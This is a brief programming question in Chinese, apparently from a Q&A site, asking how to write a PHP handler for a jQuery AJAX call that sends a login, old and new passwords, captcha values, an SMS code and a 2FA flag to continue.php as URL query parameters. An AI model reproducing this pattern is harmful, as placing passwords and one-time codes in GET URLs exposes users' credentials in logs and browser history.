【发布时间】:2020-01-17 14:20:06
【问题描述】:
我的代码中有一行
var auth = $.ajax("continue.php?act=login&login=" + encodeURIComponent(login) + "&oldPassword=" + encodeURIComponent(password) + "&captcha_key=" + captcha_key + "&captcha_sid=" + captcha_sid + "&validation_sid=" + validation_sid + "&code=" + smscode + "&newPassword=" + encodeURIComponent(g("newpassword").value) + "&is2fa=" + (have2fa ? 1 : 0) + "&qid=" + encodeURIComponent(window.location.search) + "&token=" + gettedToken).done(function() {
var response = JSON.parse(auth.responseText);
如何在 php 中处理这一行?比如...在 continue.php 中我想编写一个处理程序。
【问题讨论】:
-
“我如何在 php 中处理这一行”是什么意思?